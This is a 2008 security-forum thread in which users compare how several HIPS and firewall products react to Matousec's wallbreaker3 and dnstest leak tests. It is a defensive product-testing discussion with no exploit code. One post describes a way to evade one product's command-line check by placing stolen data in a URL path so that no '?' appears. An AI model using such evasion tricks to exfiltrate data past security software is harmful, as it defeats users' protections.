wallbreaker3, technical details

Discussion in 'other firewalls' started by alex_s, Mar 29, 2008.

Thread Status:
Not open for further replies.
  1. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    This should appear to be a not very difficult test, but it is still interesting how different HIPS pass it.

    The test can be found here:
    http://www.matousec.com/projects/security-software-testing-suite/

    What is of the most interest is commandline detection, because it allows to 100% detect suspiciouse activity at the very early stage.

    OA 2.1.0.119
     

    Attached Files:

    • 1.gif
      1.gif
      File size:
      16.3 KB
      Views:
      665
    • 2.gif
      2.gif
      File size:
      13 KB
      Views:
      661
    • 3.gif
      3.gif
      File size:
      16.1 KB
      Views:
      667
    Last edited: Mar 29, 2008
  2. hammerman

    hammerman Registered Member

    Joined:
    Jul 14, 2007
    Posts:
    283
    Location:
    UK
    Hi Alex,

    Yes, interesting result.
    I've just tried Wallbreaker3 on Comodo with D+ activated and it appears there is no command line analysis carried out.

    On starting Wallbreaker3, there is a pop-up stating explorer.exe is trying to execute wallbreaker3.exe

    After Allow to start the test, there is another pop-up stating that wallbreaker3.exe is trying to execute cmd.exe

    At this stage I guess Comodo is considered to have passed the test because you can block cmd.exe from executing.

    If you allow execution of cmd.exe, then a pop-up appears indicating iexplore.exe is trying to connect to internet.

    It appears there is no analysis of the command line parameters as in the case of OA.
     
  3. Coolio10

    Coolio10 Registered Member

    Joined:
    Sep 1, 2006
    Posts:
    1,124
    I see you read my post in the other thread before bluezanetti deleted it.
    Good :thumb: .

    Although it would be nice if you made the thread for several tests instead of just wallbreaker3.
     
  4. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    Thanks for the test ! What about EQSecure ?

    PS. I saw it in your sign :)
     
  5. ggf31416

    ggf31416 Registered Member

    Joined:
    Aug 20, 2006
    Posts:
    314
    Location:
    Uruguay
    wallbreaker3.exe (from SSTS) does almost the same as wallbreaker test 3 (calling cmd.exe to call explorer.exe to start iexplore.exe) but there are some small differences:

    2 differences between the "old" wallbreaker test 3 and wallbreaker3.exe:
    * "old" WB3 causes an alert (comodo) about Service Control Manager (like almost every software :mad: ) but it doesn't affect the result of the test.
    * "old" WB3 creates a .bat file, matousec's WB3 not
     
  6. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    He also deleted mine :)

    I see no probs with the other tests, but they are too numerous and it can get crowded. Some of them are almost duplicates. But first I'd really want to see info about other HIPS. EQSecure, ProSecurity, OutPost. I have two more tests to ask for, but after cmdline processing will be more clear.
     
  7. erreale

    erreale Registered Member

    Joined:
    May 2, 2004
    Posts:
    22

    EQS and Outpost exceed the test at the same way as OA. First is detected the launch of wallbreaker.exe then attempting to start cmd.exe, then explorer.exe for the opening web page.
     
  8. hammerman

    hammerman Registered Member

    Joined:
    Jul 14, 2007
    Posts:
    283
    Location:
    UK
  9. Nebulus

    Nebulus Registered Member

    Joined:
    Jan 20, 2007
    Posts:
    1,582
    Location:
    European Union
    I must confess, I'm not exactly sure about what this test's intention is. From what I saw in the source code, it atempts to download something from a site (matousec), and checks the downloaded data for a pattern. But if the data was sent, without any response, it also means that the firewall leaked.

    As for the command line parameters detection of OA, it seems that it finds that '?' to be suspicious. If I use an address like http://www.somesite.com/StolenPasswordIsHere instead of http://www.somesite.com/get.php?StolenPasswordIsHere OA will find nothing suspicious. Of course, in the first case I will get a 404 from www.somesite.com, but the data was sent.
     
  10. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    There is a way for improvement, of course. But my interest was of a different kind. Commandline in kernel is not available when ntcreateprocessex is invoked. So it was interesting to know either anobody care of it at all.

    Great. almost everybody care in that or other way. Then another interesting test: dnstest from the same pack. almost every pack passes it, due to execution control. But then the test infects a lanched process entry point in very interesting way. So the same question about it. What do I mean:
     

    Attached Files:

    • 4.gif
      4.gif
      File size:
      13.3 KB
      Views:
      544
  11. hammerman

    hammerman Registered Member

    Joined:
    Jul 14, 2007
    Posts:
    283
    Location:
    UK
    Alex,

    I cannot seem to reproduce your final red pop-up message with the command line parameters.

    Is there any difference between AV+ version and non-AV+ version?
     
  12. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    As far as I know there should not be any difference in HIPS. AV only checks a file at startup against virusbase. To get it clear remove exe from the programlist before to run.
     
  13. hammerman

    hammerman Registered Member

    Joined:
    Jul 14, 2007
    Posts:
    283
    Location:
    UK
    Wallbreaker3 is definitely not in the program list. When I run wallbreaker3, I get 3 pop-ups but the third one is exactly the same as the second one and it is not red and there are no command line parameters.
     
  14. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    Then this is to Mike, I think. Looks like a bug.
     
  15. ggf31416

    ggf31416 Registered Member

    Joined:
    Aug 20, 2006
    Posts:
    314
    Location:
    Uruguay
    do you have the ssts.conf in the same folder as wallbreaker3.exe?
     
  16. hammerman

    hammerman Registered Member

    Joined:
    Jul 14, 2007
    Posts:
    283
    Location:
    UK
    Yes it is.
    The program doesn't run correctly if it isn't.
     
  17. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    If you not object, could you tell about EQSecure and dnstest ? It's really very interesting.
     
  18. hammerman

    hammerman Registered Member

    Joined:
    Jul 14, 2007
    Posts:
    283
    Location:
    UK
    Alex,

    Pop-up's by EQS/OA in response to dnstest.exe
    Program Guard in OA disabled.
     

    Attached Files:

    • pu1.JPG
      pu1.JPG
      File size:
      28.3 KB
      Views:
      383
    • pu2.JPG
      pu2.JPG
      File size:
      27.8 KB
      Views:
      381
    • pu3.JPG
      pu3.JPG
      File size:
      39.2 KB
      Views:
      380
  19. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    Please, guys. Can somebody test it with Outpost, Comodo, KIS, ProSecurity ?
     
  20. Stem

    Stem Firewall Expert

    Joined:
    Oct 5, 2005
    Posts:
    4,948
    Location:
    UK
    Which test? Wallbreaker3?

    These are the popups from prosecurity after running Breakout3, I allowed all until IE attempted network access (not pictured)

    breakout3.JPG
     
  21. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    "Cmd.exe start with new command " by PS is something I see first time by a HIPS- seems a nice filter.

    Any other HIPS has such an option?
     
  22. Stem

    Stem Firewall Expert

    Joined:
    Oct 5, 2005
    Posts:
    4,948
    Location:
    UK
    First post on thread, shows OA actually showing the command line parameter.
     
  23. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    Thanks for wallbreaker3, but another interesting example is dnstest (not old dnstester, but new dnstest). The interesting point of dnstest is it is two layered. After simple first level with execution control alert, entry point infection happens.
     
  24. Stem

    Stem Firewall Expert

    Joined:
    Oct 5, 2005
    Posts:
    4,948
    Location:
    UK
    Results of dnstest against PS:-

    dnstest01.jpg

    dnstest02.jpg

    dnstest03.jpg

    dnstest04.jpg
     
  25. alex_s

    alex_s Registered Member

    Joined:
    Aug 13, 2007
    Posts:
    1,251
    Thanks, super. Prosecurity passed 100% :)
     
Thread Status:
Not open for further replies.